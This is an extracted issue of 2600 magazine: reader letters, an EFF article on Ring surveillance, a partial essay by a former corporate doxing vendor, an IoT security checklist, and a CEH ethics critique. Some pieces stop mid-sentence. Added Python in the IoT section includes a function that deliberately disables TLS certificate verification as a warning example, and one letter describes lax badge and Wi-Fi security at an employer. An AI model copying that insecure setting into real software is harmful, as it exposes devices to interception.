handwritten articles wind up in a pile that takes a 
little longer to enter into our system. It’s possible it 
was entered much earlier, but was waiting in a queue 
for space to open up, which can happen to any potential 
article. But this is the exception, not the rule. 
We still want lots more articles to come pouring in. 

Dear 2600: 

Saw this article in the recent Tulsa World. We 
cannot help but believe that you all are behind this 
in some strange way! By next week it will be 2600 
teachers without their certificates. 


M. Rottschaefer 

The headline read “Close to 2,600 nonaccred- 
ited teachers working” and, if hitting that magical 
number is what it takes to make people aware of the 
serious teacher shortage we're facing, then we're 
happy to help. 

Dear 2600: 
Why has 2600 decided to bleachbit all mention 
of the Imran Awan affair, which is the most significant 
IT security news event of the last quarter century? 


Lifetime Subscriber 

It’s so great when people assume that everything 
we do or don't do is the result of a carefully consid- 
ered decision-making process. We're not even sure 
if this accusation is confined to our own pages or 
is meant to imply that we've managed to keep the 
story out of all media. Regardless, there has been no 
such intentional action or inaction. We simply can't 
cover everything. But that doesn’t mean we won't 
bring attention to a story if someone writes in with 
the info. This was a golden opportunity to do just 
that, but your one sentence letter only scratched the 
surface. So we'll just share what is generally known, 
which is that this guy was arrested for making a false 
statement on a bank loan application. Because he 
had a connection with some Democratic members 
of the House of Representatives, there have been 
all kinds of conspiracy theories spread about him, 
which apparently we're now a part of. To put this 
into perspective, the judge who sentenced him actu- 
ally came to his defense, describing these conspiracy 
theories as “an unbelievable onslaught of scurrilous 
media attacks to which he and his family have been 
subjected.” He even added that there had been “ac- 
cusations lobbed at him from the highest branches of 
the government, all of which have been proved to be 
without foundation by the FBI and the Department 
of Justice.” 

So, by printing this, we're probably deep into the 
cover-up now. 

Dear 2600: 

Greetings from Hooli in Folsom! 

Having come from over a decade of retail back- 
ground to a corporate environment with experimen- 
tal technology, I thought certain things would have 
turned out differently. It was with naive enthusiasm 
that I had left behind what I believed to be the bot- 
tom of the employment barrel for what I perceived to 
be more dignified and professional standards. 

Though my story is likely a dime a dozen, it 
still strikes me as shocking how my current em- 
ployer gets into frequent trouble with the many in- 
ternal conflicts, lawsuits, and “corporate espionage.” 
There are also many Game of Thrones-like micro- 
conflicts amongst the multitude of laboratories here. 
Between the “CWs” (aka contingent workers), the 
direct-hires, individuals here on working visas, and 
“guests” from other locations, there’s a constant 
chess game of calculating rank and subjective su- 
periority that seems to change with the projects and 
work weeks. 

Despite this multi-billion dollar company spend- 
ing tons of money on these petty squabbles, it 
fails horribly in its security. You can read about it 
in the Sacramento Bee or other forms of media or 
publishing. Despite their attempts to maintain their 
workforce, individuals continue to leave for false 
promises with competitors, only to be cheated out of 
promised employment. 

If that wasn’t bad enough, the security practices 
are lacking and sub-par. It also doesn’t help that 
most of those responsible to uphold them are among 
the reasons they were enacted in the first place. On a 
side note, why would one make a 12-foot-long ban- 
ner advertising a top-secret project for anyone who 
walks into the lobby to see? 

As a curious and ponderous individual, I am 
constantly observing and poking at the security mea- 
sures before I even enter the front door. To enter the 
labs after getting into the lobby, you need to wave 
your badge over the reader. Normally, your person- 
alized badge has a crappy picture of yourself on it, 
along with your full name. These pictures are too 
small to be clearly seen from six feet away and are 
often faded. If you lose your badge, you can request 
a temporary, which omits basically all visible per- 
sonalization from it - you are “supposed” to return 
them at the end of the day, but they do get lost. If 
some mal-intent individual were to come across a 
temp badge, they might be tempted to use it soon 
- fortunately, the temp badges expire after 24 hours. 
Use it before you lose it. On that note, I noticed that 
the RFID badges still work even when I have mine 
in my pocket. One could conceal the poor picture 
while still using the badge. Of course, employees oc- 
casionally hold the door open for each other, which 
is a no-no, a fact that is only posted inside the labs. 

Wireless security is a joke. There’s no MAC or 
IP filtering of any sort. There is the typical website 
blacklist though - but that can be easily averted. The 
ranges of the wireless APs stretch far beyond what’s 
necessary. Why is this a concern? Because if you can’t 
physically get in, you could at least get into the net- 
work. These slightly smaller (though still too large) 
targets are often the ones with classified files in the 
connected drives. Getting a “guest” access account is 
easier than getting a temp badge - and allows for the 
potential to access such network folders. I’ve tested 
this out - it still works. Now that our internalized “IT 
team” is being outsourced overseas with our net ad- 
min, I suspect more problems will emerge eventually. 




I can go on and on about Folsom Fails, but my 
point is that in my years of retail, I was never exposed
to the kind of negligence and hypocrisy that 
I'd only read about prior. I had imagined the grass to 
be greener on the other side (and in many ways it is), 
but reality is not as pretty as aspirations. Being the 
security conscious and pro-free-software tech that I 
am puts me in an awkward position at the moment, 
but I’m doing what I can to bring awareness to those 
around me. 


Der 

While specific details have been mercifully left 
out, we're always happy to print info that really ex- 
poses security holes at named companies or organi- 
zations and forces some necessary changes. Thanks 
for keeping your eyes open and for sharing. 

Dear 2600: 

I moved to this area in July 2017 and have passed 
by this store every day until fairly recently. One day, 
I noticed that their gas prices had dropped - and I 
needed beer, too. So after looking at my receipt, I 
noticed their address. Wow! It’s 2600. Now I stop by 
the store every time I need gas and beer. 

Lifetime member 
Jim 


[Image: customer receipt from Quick Stop, 2600 HWY 378, Gilbert, SC 29054]

Wouldn't it be nice if every business that had our 
name as part of their address was guaranteed the 
support of our community? 

Dear 2600: 

In the Winter 2018-19 issue of 2600, Pop Rob 
mentions that the USPS photographs the covers of 
U.S. mail in order to speed delivery, but erases the 
information after 30 days (“Sorting It all Out: The 
Long Lost Bastard Children of the United States 
Postal Service”). Do you believe everything the 
gum-mint tells you? I don't! Never ever believe the 
government! 

What actually happens is that before the USPS 
erases the information, some other TLA (three letter 
agency) hacks the USPS files and takes that informa- 
tion and stores it forever. It might be the CIA, NSA, 
772, or all of the above, but it is stored for later use. 
They can tell you received eight letters from zip code 
40202, but not the specific person just by decoding 
ZIP code information. If nothing is written as a re- 
turn address or identifying information, then they are 
stuck. 

I am subscribed to Informed Delivery and it is 
very convenient to know what will be arriving in to- 
day’s mail. I only receive package information maybe 
20 percent of the time depending on how metered 
postage is paid. I am also a very experienced phila- 
telic collector and was a good friend of former Post- 
master General Marvin Runyon. I first met him when 
he was the head of the Datsun plant, now Nissan, in 
Smyrna, Tennessee, and I covered him for the local 
newspaper. 

I have a friend that has big connections with Fe- 
dEx in Memphis (does business with them) and is a 
Motorola radio dealer who buys lots of radio surplus 
stuff from the federal government and others. It is not 
“current” surplus, but maybe one generation from 
current, so they surplus it for pennies on the dollar, 
sometimes for tenths of a penny on the dollar, and 
then sell it on eBay (aka eGreed). I am a ham radio 
guy with extra class privileges, the highest available. 
I also have lots of DES-XL, DVP-XL, and AES 256 
encryption methods available for my radio hobby. I 
have keyloaders for all of the algorithms and even a 
KVL4000 key loader, the latest Motorola acknowl- 
edges they make. No telling what they only make for 
the gum-mint. It is illegal to use encryption for ham 
radio unless you are communicating with a satellite. 

My wife has been told that if anyone comes by 
the condo and asks to come in, you ask them “Do you 
have a warrant or probable cause? If the answer is no, 
tell them to get their ass back out on the street as they 
are trespassing! I didn’t work for over 40 years with 
the local news media for nothing. 

Oh, and I also have cans of CIA X-ray spray that, 
if you spray an envelope, you can usually read what 
is inside. Wonder if they use it on letters addressed 
to 2600? I bet they sometimes do! I sometimes wrap 
heavy construction paper around information ad- 
dressed to others I don’t want read! 


ABE 

(not my real name) 

If you reread the article in question, you'll see that 
the author expresses the same skepticism you do as to 
whether or not those images are truly destroyed. And 
while we'd love to believe the scenario you describe 
as to what really happens to this data, you didn't 
provide any actual proof, other than suspicion and 
mistrust of the government, which is more than likely 
justified. But actual evidence is really good to have. 

There seems to be some debate in the ham radio 
community as to whether or not encryption is illegal 
for general communications. We'd love to get more 
input on this. 

And we bet your wife didn’t need to be “told” 
by you how to handle warrantless entry - she likely 
already knew that plus a whole lot more. 

Thanks for explaining why this letter was mailed 
to us attached to a sheet of black construction paper. 
We thought it was just for the look (which was pretty 
cool). And, for some reason, all of our normal suppliers
of x-ray spray have dried up. 

Dear 2600: 

I am in an institution and, as I await the resolu- 
tion of an appeal to conclude that my last issue of 
2600 isn’t “contraband,” I was just reading a recent 
Consumer Reports (January 2019, page 7 “Reopen- 
ing the Internet”). I am pleased to report that Con- 
sumer Reports has been assisting in some efforts 
regarding the net neutrality laws now being passed 
by some states, even though the feds don’t believe 
the states can be responsible to handle their own 
guidelines. 

Let me quote a bit for you: “California has been 
the latest state to restore net neutrality protection... 
The law, considered to be the most comprehensive 
in the nation will defend consumer choice and com- 
petition by preventing ISPs from blocking, slowing 
or giving preferential treatment to any websites or 
apps.” 

Although California is only one of three (Wash- 
ington and Oregon included), they (Consumer 
Reports) believe that because of California’s size 
(and tech-savvy valley girls), it may more heavily 
influence the overall outcome of this fight. Califor- 
nia’s Consumer Reports members sent over 20,000 
emails to state reps supporting the bill. In the end, 
the feds determined that the states lack authority to 
enact their own such guidelines. 

The fact that Big Brother continues to cogitate 
they have the best interests of the public in mind, I 
can only imagine the level of lobbying that ISPs are 
investing in. But please, read on.... 

There is a federal bill backed by Consumer Re- 
ports and Senator Ed Markey (D-Massachusetts) 
that would reverse the FCC’s repeal. It passed the 
Senate in May, but got stalled in the House. 

To assist in this fight, go to
action.consumerreports.org/tech20180611comments. 

I would like to see some details or an article 
about the biggest ISP companies involved in this 
cock-blocking effort, including the lobbyist firm(s) 
assisting them. (Maybe that’s a bit harsh.) 

As stated earlier, at present I do not have the 
resources many of you have, but I have a dummy 
workstation and am educated enough to write a 
pointed letter or two. If anyone has facts on this 
topic and how more of us can be directly involved, 
I’m sure I am not alone in wanting to know more. 
For those of you who don’t write, you can tell your 
people to boycott these power hungry bullies by not 

EFFecting Digital Freedom 

Amazon Ring Is Turning Our Front Doors Into Vast, 
Unaccountable Surveillance Networks 

by Jason Kelley 

Before it became a corporate-sponsored police 
mass-surveillance tool that’s contributing to irrational
panic in neighborhoods across the country, 
Ring began in 2013 as a “smart” doorbell. The 
company’s camera-enabled product allowed you to 
remotely see who was at your front step, right from 
your phone. But with its rapidly growing partnerships
with law enforcement, and its “crime prevention”
social networking app, Ring has quickly 
mutated into a tool for police to spy on neighborhoods,
and neighbors to spy on one another. 

Ring doorbells record video of visitors, deliveries, 
residents walking nearby, and anything else that triggers
the motion sensor, plus the vicinity across from 
the user’s device, often including other neighbors 
and their homes. This video is transmitted straight 
to users’ phones. After Amazon’s purchase of the 
company in 2018, that video also goes to the cloud, 
where it’s available for members subscribed to Ring’s 
“Protect” plan for up to 60 days. Users can quickly 
share the footage to the “Neighbors” app, the company’s
community-watch focused local social network. 

Intrepid reporting has revealed that the footage 
is also often available to local law enforcement - and 
that police are working in tandem with the company 
to promote their products. Together, Ring and law 
enforcement are creating a vast network of cameras 
linked together whose recordings are centralized and 
available to police directly from the company. 

There are significant privacy concerns with this - 
and they are multiplying quickly. First, the majority 
of alerts from motion-sensitive smart doorbells are 
simply not indicative of crimes, though constant 
push-notifications will create the illusion of a house 
that’s under constant threat. Add in the ability to 
share “crime and safety notifications” with neighbors 
at the touch of a button, and you've created a vicious 
cycle that convinces users and non-users alike that 
they must protect themselves from “suspicious 
activity” - despite the fact that crime in the United 
States has been steadily decreasing for decades. The 
cameras have inflamed tensions in communities 
across the country, as residents post videos of people 
who they don’t recognize or who they believe are 
up to no good, with no evidence of actual criminal 
activity. Ring and its partner app, Neighbors, supercharge
a community’s ability to spy on itself. 

Second, law enforcement is partnering directly 
with Ring in a symbiotic relationship that’s beneficial
to both Amazon’s bottom line and the law 
enforcement panopticon. As of this writing, over 400 
police jurisdictions were working directly with the 
company, which gives talking points, special incentives,
and promotional materials to agencies who 
then do Ring’s marketing for them. Ring even looks 
at law enforcement press releases and messaging 
in advance, crossing out words like “surveillance” 
because it might “confuse residents.” Sometimes, 
as in the case of Ewing, New Jersey, the city itself 
pays Ring directly, which then gives discounts on the 
devices to Ewing residents. 

What do police get out of it? A massive network 
of 24/7 surveillance footage that’s available without 
the usual paperwork - or the scrutiny of residents 
who would undoubtedly balk if required to add 
police-accessible cameras to their front doors. Once 
the devices are installed, Ring makes it easy for 
police to request videos - what the company calls 
the ability to “solve more cases with one click.” 
Law enforcement can log on to a specialized web 
portal and request video from a specific time and 
geographic area. Then Ring automatically sends all 
the users in that area an email asking them to “take 
direct action to make [their] neighborhood safer” 
by sharing their videos with the police. Users can 
decline. But in an environment where neighbors, 
local government, law enforcement - and a company 
you pay to protect your home - are all teaming up to 
demand your video footage, the pressure to comply 
is enormous. And even if you say no, the company 
will still present the recorded videos to police if 
required by a warrant. 

Yet another privacy concern lies over the 
horizon. Ring isn’t Amazon's only disturbing 
surveillance system. Amazon also sells police a face 
surveillance system called Rekognition. It might not 
be difficult for Amazon to merge these two systems, 
allowing police to apply Rekognition face surveil- 
lance to everyone who happens to walk down the 
street past a Ring camera. Amazon has even filed 
patents indicating their interest in creating a real- 
time alert system that recognizes suspicious indi- 
viduals. It’s easy to imagine the draw this sort of 
surveillance tech might have for law enforcement, 
despite growing public objections to government use 
of face recognition. 

Do our communities really need Ring, and its 
expanding assault on our civil liberties? Or have 
Amazon and the police stoked fear and anxiety 
about criminal activity to convince people to pay for 
a massive new surveillance system? It’s time for city 
councils and community residents to decide whether 
to shut down police access to these vast video 
surveillance networks. Even better, it’s time for 
cities to adopt laws forbidding police from unilater- 
ally acquiring access to such surveillance tech, and 
instead empowering community residents and city 
councils to decide. The safety of our communities 
matters, but it should not come at the expense of our 
privacy. 

fictive 


by Anonymous 


I was a hired gun for many large corpo- 
rations, finding dirt on targets, doxing their 
family homes, and providing a written report 
as if it was an ethical, professional service 
rendered. Oh, you too? Yes, this is a profes- 
sion, yes, you can get paid to dox people on 
the Internet, and I would bet that someone you 
know does the same thing. And we suck. 

I’ve also been targeted by corporations who 
didn’t like some reverse engineering I was 
doing. Their goons tried to track me down to 
send me a legal threat and I at least confused 
them for six months before they had to resort 
to using my hosting company to find me. 

Almost every single large organization has 
an industrial espionage team that might fly 
under a different name like “competitive intelligence”
or “business analysis division.” No 
one thinks Brenda from Business Analysis is a
threat, but we should be afraid of her. 
Their job is to find threats to their organi- 
zation, be it a competing company that could 
affect their stock price or a kid in an IRC 
channel trying to build support for a protest 
which is just bad PR. And those teams have 
teams of third-party vendors that do some of 
the dirty work for them. Not always because 
they can’t do it themselves, but because they 
want the deniability if something goes wrong. 
I was one of these vendors and I want to 
share things that might help you if you’re ever 
targeted by a goon like me. 

Know Your Enemy 

One of the things that motivates me is being 
told I’m not allowed to do something and then 
proving them wrong. So when you block my 
access to your Facebook page or delete your 
Twitter account, I just work harder to find dirt 
on you. I bet, in some ways, you're like this 
too. So are people working in corporate intel. 
We can use this information to coordinate a 
better defense. 

We are focusing on one threat here: that of 
the salaried, 401k contributing, 9-5 corporate 
intelligence goon. They are not nation state 
adversaries, they are not local law enforce- 
ment. They have specific operating constraints 
that can be exploited for defensive purposes. 
Here’s what you should know: 

1. They are resource constrained. 

Unless you've done something particularly 
nefarious, you’re not worth all their time. Or 
for the third parties working for corporations, 
you can’t spend a month on a person and not 
have actionable intel. You have to determine 
whether it’s worth it at the beginning of the 
project. Let’s see if we can’t waste some of 
their important time. 

2. They need to produce a result. 

In enterprise environments, you don’t get 
paid to start projects that don’t go anywhere. 
If they are targeting you, they are going to 
produce a result. It’s a simple boolean conclu- 
sion: threat, no threat. And they must provide 
supporting evidence to justify this conclusion. 

“She is a threat because she’s building 
support for a protest in front of the building.” 

“He is not a threat because he’s 13, lives 

CITIZEN ENGINEER 

by Limor “Ladyada” Fried (ladyada@alum.mit.edu) and Phillip Torrone (fill@2600.com) 
“Preventing IoT Device Attacks” 

“Attack surface reduction” is a security principle that you can use to guide your choices when 
designing an IoT product or service. The attack surface of a hardware or software environment 
is all of the different points where an unauthorized user can try to insert or extract data. Keeping 
the attack surface as small as possible is an essential but necessary security measure. Since 
devices like the ESP8266 and others have come along, anyone can be an IoT device developer 
for about $5. 

With IoT, there are at least two attack surfaces. The thing itself, say an Internet-connected 
temperature sensor, and the service - whether Google Cloud, Microsoft Azure, or Amazon 
AWS, etc. Since web service security has been discussed a ton in 2600 Magazine and other 
publications, let’s go over device security, from the easiest first. 

These “ten things” are not everything you'll have to worry about, but it’s a good start, and 
if you do these, you’re ahead of 99 percent of IoT vendors. 

#1 Require login and password. This is number one because it’s the bare minimum. Don’t 
have an open, network-accessible interface to your IoT device. You may think “oh nobody is 
going to guess the URL or the port number” but that’s the first thing attackers probe. Even if it’s 
on an intranet, require some authentication! 

#2 Don't have default logins and passwords. We mentioned this before, but it bears repeating 
because it’s so common! Make sure your device has a unique, unguessable password by default. 

#3 Two-factor authentication. In addition to a username and password, maybe have an SMS 
or time-based second factor. 2FA will protect you even if the password is sniffed or stolen. 2FA 
is free and pretty easy to implement these days - you no longer have to distribute a physical 
token, since most everyone has a mobile phone. 

#4 Require TLS/SSL. Whenever your users or devices connect to the Internet, whether over 
Wi-Fi or cellular, use the latest available version of TLS, sometimes called SSL or HTTPS. 
TLS will encrypt all data transmitting between the device and the service, protecting both. TLS 
will significantly reduce your risk of sniffing. A few years ago, microcontrollers were older 
and smaller and couldn’t effectively run a TLS stack. Nowadays, there’s no excuse to skip it. 

#4.5 Authenticate Host Certificates. TLS is not just data encryption; it’s also server authenti- 
cation. So, if you’re using TLS, make sure your device is checking the fingerprint or certificate 
chain of the server. We’ve seen some TLS implementations where it’s possible to skip this, 
which makes man-in-the-middle attacks possible. 

#5 Turn off any unused services. If you have an embedded Linux or RTOS for your device, 
make sure no services are running. File sharing, remote login, mail servers, etc. These days, 
most services are not enabled by default, but check anyway. Sometimes these are left on during 
development and are forgotten when the firmware is released. 

#5.5 Don't accept any inbound connections. If you can, don’t allow any way for outside 
parties to connect into the device. If you have a debugging port left open, that’s just another 
attackable surface. 

#6 Require physical access for important configurations. We've seen some Wi-Fi cameras 
that can be controlled over the Internet, but if you want to change the access point password, 
you need to plug it into a computer and change the setting over USB. This reduces the surface 
that can be attacked by automated scripts. 

#7 Individualized/Revocable Authentication Keys. For your device to connect to the service, 
chances are it has some authentication key or password. Make sure that you have a unique key 
or password for each device - even if the user never sees these, you shouldn’t reuse them. You'll 
also need to have a way to revoke/re-instantiate keys if they’re lost, corrupted, or stolen. 

#8 Data Paranoia. Even though you may only be shuffling data from your IoT device to 
your IoT service, don’t trust that the data is well-formatted. This is often forgotten in a rush to 
complete and ship firmware, but you should assume that attackers will try to send corrupted or 
malformed chunks of data to both sides of the connection to corrupt memory. Clean up and vet 
data thoroughly; this will also keep your device running smoothly if the network connection 
is flaky. 

#8.5 Updatable Firmware. Bootloaders are the best, and it’s a good idea to have one on your 
device. Many are write-only so that the deployed firmware can’t be read. Being able to update 
firmware will help customers recover the device if it gets bricked, hacked, or if there’s a critical 
security update. We like USB bootloaders the best, or ones where you insert an SD card with 
a file. Having updatable firmware increases your attack surface a bit because it opens another 
access point into your device, but we think that if someone has physical access, they could 
connect a JTAG programmer to erase and reprogram it anyways. 

#9 Secure storage for authentication keys. Embedded Linux devices have a regular filesystem,
and microcontrollers often store their code in flash memory, so even if you hard-code 
authentication keys in flash or EEPROM, it can be read out. Yes, even if you have a chip that 
has firmware-readback turned off, it’s possible to glitch chips into revealing their secrets. Your 
microcontroller memory should not be considered secure storage! Instead, you may want to 
consider using a secure element chip. These chips are designed to withstand common decap- 
ping and glitching attacks and can be programmed with the private key at your factory. Then, it 
never leaves the secure chip. Instead of having the key sit in microcontroller memory where it 
could be read out, data that needs to be authenticated or encrypted is sent back and forth through 
I2C. It’s a little extra cost, but it is an excellent way to keep the secrets in a lock-box. 

#10 Over the air updates. This one is a little tricky. Not having OTA is risky because then 
there’s no way to send important security updates. On the other hand, having OTA is dangerous 
because it allows an attacker to take over the device completely. We think OTA is a good idea, 
but you need to combine it with the prior rules - firmware must be transmitted over an authenti- 
cated, encrypted connection. Having firmware be signed with public-key cryptography (so the 
private key is not stored on the device) is a common idea, but be aware that private keys can 
leak out, so that should not be the only way you verify the firmware is valid. 

We’ve seen more than one company accidentally “brick” their devices with a mistaken OTA 
- some even required a physical recall - so if you do have OTA updates, make sure you always 
have a way for physical-access-rollback. 
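
Item #4.5 in code, as an added example that is not from the authors: Python's standard `ssl` module showing the setting that skips server authentication beside a hardened client context, plus a certificate fingerprint check. The function names, `SAMPLE_DER` and the idea of shipping a backup pin are assumptions made for this illustration.

```python
import hashlib
import hmac
import socket
import ssl
from typing import Iterable, Optional

# Constructed stand-in for a DER-encoded certificate, used only to exercise the pin check.
SAMPLE_DER = b"constructed-bytes-not-a-real-certificate"


def insecure_context() -> ssl.SSLContext:
    """The skip the article warns about: traffic is encrypted, the peer is not authenticated."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False       # has to be cleared before CERT_NONE is accepted
    ctx.verify_mode = ssl.CERT_NONE  # any certificate passes, including a man-in-the-middle's
    return ctx


def device_context(ca_file: Optional[str] = None) -> ssl.SSLContext:
    """Hardened client context: chain validation, hostname check, TLS 1.2 or newer."""
    ctx = ssl.create_default_context(cafile=ca_file)  # system CA store when ca_file is None
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # Both are already the defaults; stating them makes a weakening edit stand out in review.
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def cert_fingerprint(der_cert: bytes) -> str:
    """SHA-256 of the DER certificate as lowercase hex."""
    return hashlib.sha256(der_cert).hexdigest()


def fingerprint_matches(der_cert: bytes, pins: Iterable[str]) -> bool:
    """True if the certificate matches any pinned fingerprint (with or without colons)."""
    actual = cert_fingerprint(der_cert).encode()
    ok = False
    for pin in pins:
        wanted = pin.replace(":", "").strip().lower().encode()
        ok |= hmac.compare_digest(actual, wanted)
    return ok


def open_pinned(host: str, port: int, pins: Iterable[str],
                timeout: float = 10.0) -> ssl.SSLSocket:
    """Connect, validate chain and hostname, then require a pinned fingerprint as well.

    Ship at least two pins (current and next certificate) so that a routine
    certificate renewal does not lock deployed devices out of the service.
    """
    raw = socket.create_connection((host, port), timeout=timeout)
    try:
        # The handshake raises ssl.SSLCertVerificationError on a bad chain or hostname.
        tls = device_context().wrap_socket(raw, server_hostname=host)
    except Exception:
        raw.close()
        raise
    der = tls.getpeercert(binary_form=True)
    if der is None or not fingerprint_matches(der, list(pins)):
        tls.close()
        raise ssl.SSLError("server certificate does not match a pinned fingerprint")
    return tls
```
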

For both your IoT device and service - if it has a web interface, it should be protected against 
standard hacking techniques like remote code execution, path traversal, cross-site request 
forgery, and SQL injection. There are scanning services you can run against the website as well 
as on the code itself to find egregious errors. 
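
Items #7 and #8 seen from the service side, as an added example that is not from the authors: every device gets its own random key that can be revoked and re-issued, and no field of an incoming frame is trusted until its size, length field, authentication tag, counter and value range have all been checked. The frame layout and the names `Registry`, `build_frame` and `accept_frame` are assumptions made for this illustration.

```python
import hashlib
import hmac
import secrets
import struct
from dataclasses import dataclass

# Constructed frame layout (an assumption for this example):
#   magic "T1" | device_id u32 | counter u32 | n u8 | n x int16 centi-degC | 16-byte HMAC tag
HEADER = struct.Struct(">2sIIB")
MAGIC = b"T1"
TAG_LEN = 16
MAX_READINGS = 8
TEMP_MIN, TEMP_MAX = -4000, 12500   # plausible sensor range: -40.00 to 125.00 C


class FrameError(ValueError):
    """Raised for any frame the service refuses to process."""


@dataclass
class Device:
    key: bytes
    revoked: bool = False
    last_counter: int = -1


class Registry:
    """Service-side key store: one random key per device, revocable and re-issuable."""

    def __init__(self):
        self._devices = {}

    def provision(self, device_id: int) -> bytes:
        # Also the re-instantiate path: a fresh key replaces a revoked or leaked one.
        self._devices[device_id] = Device(key=secrets.token_bytes(32))
        return self._devices[device_id].key

    def revoke(self, device_id: int) -> None:
        self._devices[device_id].revoked = True

    def get(self, device_id: int):
        return self._devices.get(device_id)


def _tag(key: bytes, body: bytes) -> bytes:
    return hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]


def build_frame(key: bytes, device_id: int, counter: int, temps) -> bytes:
    """Device side, included only so the example can produce input for accept_frame."""
    body = HEADER.pack(MAGIC, device_id, counter, len(temps))
    body += struct.pack(f">{len(temps)}h", *temps)
    return body + _tag(key, body)


def accept_frame(registry: Registry, frame) -> tuple:
    """Validate one frame; return (device_id, counter, [deg C, ...]) or raise FrameError."""
    if not isinstance(frame, (bytes, bytearray)):
        raise FrameError("frame must be bytes")
    frame = bytes(frame)
    smallest = HEADER.size + TAG_LEN
    if not smallest <= len(frame) <= smallest + 2 * MAX_READINGS:
        raise FrameError("frame size out of bounds")
    magic, device_id, counter, n = HEADER.unpack_from(frame)
    if magic != MAGIC:
        raise FrameError("bad magic")
    # Never let the sender's length field drive a read: it must agree with what arrived.
    if not 1 <= n <= MAX_READINGS or len(frame) != smallest + 2 * n:
        raise FrameError("length field disagrees with frame size")
    dev = registry.get(device_id)
    if dev is None or dev.revoked:
        raise FrameError("unknown or revoked device")   # same answer for both cases
    body, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
    if not hmac.compare_digest(tag, _tag(dev.key, body)):
        raise FrameError("authentication tag mismatch")
    if counter <= dev.last_counter:
        raise FrameError("replayed or stale counter")
    temps = struct.unpack_from(f">{n}h", frame, HEADER.size)
    if any(not TEMP_MIN <= t <= TEMP_MAX for t in temps):
        raise FrameError("reading outside sensor range")
    dev.last_counter = counter   # state changes only after every check has passed
    return device_id, counter, [t / 100 for t in temps]
```
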

Good night and 
good luck. 

by aestetix 


Certifications (certs) have been around for 
a long time. There are real benefits to them: 
whereas a traditional college degree in a field 
like computer science gives us four (or five) 
years of intensive education which we slowly 
forget and which can become outdated, certi- 
fications encourage us to keep up to date on 
technology and provide employers with a 
more accurate way to gauge aptitude. 

There is a downside, though, especially 
when people obtain a cert and then assume they 
know technology better than people without a 
cert. The comic Dilbert captured this well in 
an old strip from October of 2000 in which a 
certification “superhero” proudly summons the 
“vast powers of certification,” and then real- 
izes he can’t remember anything else from the 
classes. 

A more dangerous issue with certifications 
has arisen in recent years, beginning with the 
CISSP, and now moving to full force with 
the Certified Ethical Hacker (CEH) certifica- 
tion. People who have achieved their CISSP 
will frequently tell us that they have had to 
“reform” their hacker ways, or that they had 
to stop using a handle as part of the guide- 
lines of the cert. But the CEH takes this a 
step further, establishing a rather long Code 
of Ethics (www.eccouncil.org/code-of-ethics/)
which every individual who 
earns a CEH is required to swear an oath to 
uphold. For anyone who adheres to the original 
“Hacker Ethic” as described by Steven Levy in 
his book Hackers, several demands from the 
CEH Code of Ethics are very problematic. 

To start with: item 16 of the Code states 
that one must vow “Not to take part in any 
black hat activity or be associated with any 
black hat community that serves to endanger 
networks.” If we define “black hat activity” 
as illegal activity - although CEH does not - 
the first part of this seems reasonable enough. 
The second part raises some questions though. 
What is a “black hat community?” What if 
we are in a community where some of the 
members download illegal copies of episodes 
of Game of Thrones? Is this enough to warrant 
a violation? And beyond that, what if we are 
in a group where some people do “black hat” 
things, but we ourselves do not? Is it really fair 
to punish someone for the crimes of someone 
else, simply due to association? 

It gets even worse with item 17, which 
demands us “Not to be part of any under- 
ground hacking community for purposes of 
preaching and expanding black hat activities.” 
What do “preaching and expanding” mean? 
What if we’re in an IRC channel where some 
people do illegal things, and we have discus- 
sions with them? Are we required to cut off ties 
with people? And who decides what consti- 
tutes “black hat?” What if we encourage civil 
disobedience, pushing to purposefully break a 
bad law in order to enact a greater good? Is this 
grounds for a Code violation? I now wonder 
if the hackers who devised Stuxnet, the worm 
that infected Iran’s nuclear centrifuges, would 
be in violation of the Code, even though they 
were carrying out orders from the President. 

The last item we need to visit is a bit more 
controversial, but nonetheless important. Item 
19 states that we should not be “convicted 
in any felony” nor should we have “violated 
any law of the land.” This rule is simply too 
sweeping. What if we are a convicted felon for 
something unrelated to computers? And more 
important, what if we are a convicted felon, 
but have served our time, and want to reinte- 
grate into society? If someone has done some- 
thing wrong in the past and wants to redeem 
themselves, isn’t agreeing to follow a set of 
ethics precisely what they should do? Why 
create a requirement that eliminates the very 
people who might want to use this certification 
to achieve that goal? 

That’s just the Code itself. And, while I 
think it is poorly thought out, the enforce- 
ment of it is even worse. The EC-Council, who 
provides this cert, has a procedure to report 
“violations” of the Code, found at
cert.eccouncil.org/report-violation.html. The form amounts 
to filling out a police report, using the Code, 
and including the items we just reviewed as 
a pseudo-legal system. Anyone can fill out 
this form and report someone. It is in a sense 
creating secret police, because anyone who 
doesn’t like us can figure out an interpreta- 
tion of Code that will make us look bad. The 
result is that we could lose our certification. 
Of course, the EC-Council will likely assure 
us that these things would never happen and 
we're reading too much into their words. But 
then I must ask: what is the point of having a 
Code to which they force people to swear an 
oath if they do not plan to enforce it? 

And it’s not just that. More and more secu- 
rity and technology jobs these days have “CEH 
certification” as a job requirement, partly 
because it’s a nice sounding term that HR can 
use to filter out resumes. So what happens 
when someone sees us download Game of 
Thrones, decides that this violates item 16, and 
reports us? If the EC-Council Tribunal takes 
up our case and decides against us, not only 
could we lose our certification, we could also 
lose our job and livelihood. And because this 
is becoming a standard with many companies, 
this amounts to being blacklisted from getting 
another tech job, unless EC-Council Tribunal, 
in their good graces, grants us some form of 
clemency. 

Adding insult to injury, the use of the word 
“ethic” within the CEH Code is completely 
removed from any traditional definition. When 
we study ethics in school, we might have a 
class on Aristotle, or explore exercises like 
the Trolley Problem and learn that sometimes 
there is no good way out of a situation. With 
the CEH Code, all of the items reinforce a 
notion that mindless obedience to corporations 
and governments is good, which betrays both 
the Hacker Ethic as well as a true exploration 
of the word “ethic.” In truth, the CEH certifica- 
tion is a scheme that is used to trap people who 
are interested in working in tech into a situa- 
tion that binds and controls not only what they 
do outside of work, but even the people with 
whom they associate. 

To paraphrase Orwell, Big Brother is Certi- 
fying You. 


THOUGHTS ON 
ACCOUNT ENUMERATION 


by Sam@sayen.io 


As a pentester who makes his living doing 
various proactive services, I have had the 
opportunity to do authenticated and unau- 
thenticated pentests on dozens and dozens of 
professionally developed web applications. 
Many of the OWASP “top ten” findings are 
talked about extensively and, on a technical 
level, they are more interesting than account 
enumeration. Subtle details with authentica- 
tion make what is typically considered a low 
level finding quite exploitable and serious. 
